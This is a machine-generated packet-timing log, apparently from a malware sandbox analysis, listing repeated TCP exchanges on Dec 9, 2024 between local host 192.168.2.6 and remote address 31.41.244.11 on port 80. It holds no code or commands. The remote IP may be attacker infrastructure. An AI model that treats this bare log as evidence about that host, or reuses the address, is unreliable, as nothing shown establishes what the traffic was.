                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.055006981 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.055882931 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.055921078 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.056044102 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.056086063 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.057564974 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.057609081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.057630062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.057667971 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.058079958 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.058125019 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.058185101 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.058224916 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.059181929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.059222937 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.059248924 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.059293032 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.060221910 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.060259104 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.060328960 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.060372114 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.061289072 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.061330080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.061430931 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.061474085 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.062381983 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.062423944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.062537909 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.062578917 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.063469887 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.063512087 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.063576937 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.063616991 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.064524889 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.064563990 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.064651966 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.064693928 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.065643072 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.065680027 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.065787077 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.065829992 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.066694021 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.066735029 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.066817045 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.066858053 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.067826033 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.067867994 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.067889929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.067926884 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.068892002 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.068929911 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.069000006 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.069041014 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.070025921 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.070067883 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.070089102 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.070127964 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.071104050 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.071146011 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.071218967 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.071255922 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.072206974 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.072268009 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.072346926 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.072387934 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.073220015 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.073261023 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.073307037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.073348045 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.074431896 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.074474096 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.074632883 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.074676037 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.075421095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.075460911 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.075545073 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.075584888 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.076493979 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.076538086 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.076586008 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.076623917 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.077569962 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.077614069 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.212999105 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213061094 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213181019 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213222980 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213453054 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213494062 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213624001 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213668108 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213829041 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.213870049 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.214755058 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.214796066 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.214920998 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.214962959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.215830088 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.215869904 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.215893030 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.215931892 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.216907024 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.216944933 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.217011929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.217052937 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.217987061 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.218024015 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.218048096 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.218086958 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.219116926 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.219156981 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.219182014 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.219221115 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.220231056 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.220274925 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.220298052 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.220330000 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.221374035 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.221420050 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.221513033 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.221563101 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.222305059 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.222346067 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.222387075 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.222425938 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.223412991 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.223450899 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.223532915 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.223565102 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.224487066 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.224525928 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.224613905 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.224647999 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.225560904 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.225599051 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.225668907 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.225706100 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.226644039 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.226686001 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.226802111 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.226870060 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.227778912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.227824926 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.227866888 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.227900982 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.229394913 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.229408979 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.229444027 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.229460955 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.230017900 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.230061054 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.230130911 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.230173111 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.230992079 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.231059074 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.231141090 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.231182098 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.232256889 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.232301950 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.232381105 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.232419968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.233558893 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.233609915 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.233676910 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.233716011 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.234291077 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.234343052 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.234407902 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.234450102 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.235377073 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.235418081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.235496044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.235536098 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.236407995 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.236454964 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.236529112 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.236571074 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.237546921 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.237587929 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.237668037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.237711906 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.238593102 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.238640070 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.238787889 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.238827944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.239692926 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.239738941 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.239762068 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.239805937 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.240756989 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.240803003 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.240904093 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.240947962 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.241842031 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.241894960 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.241928101 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.241971016 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.242957115 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.243002892 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.243022919 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.243065119 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.244028091 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.244071007 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.244165897 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.244199038 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.245114088 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.245193005 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.245218039 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.245255947 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.246223927 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.246273994 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.246340036 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.246382952 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.247307062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.247345924 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.247354984 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.247380972 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.248368979 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.248420954 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.248531103 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.248573065 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.249434948 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.249483109 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.249536037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.249574900 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.250531912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.250577927 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.250600100 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.250638008 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.251650095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.251713037 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.251738071 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.251779079 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.252686024 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.252728939 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.252859116 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.252932072 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.253776073 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.253819942 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.253977060 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.254020929 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.254868984 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.254918098 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.255053997 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.255098104 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.255951881 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.256001949 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.256059885 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.256112099 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.257034063 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.257083893 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.257179022 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.257216930 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.258172989 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.258214951 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.258291006 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.258326054 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.259227037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.259258032 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.259268045 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.259285927 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.260328054 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.260375023 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.260399103 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.260437965 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.261434078 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.261496067 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.261538982 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.261584044 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.262485981 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.262528896 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.262638092 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.262675047 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.263731956 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.263828993 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.263979912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.264019966 CET4985980192.168.2.631.41.244.11
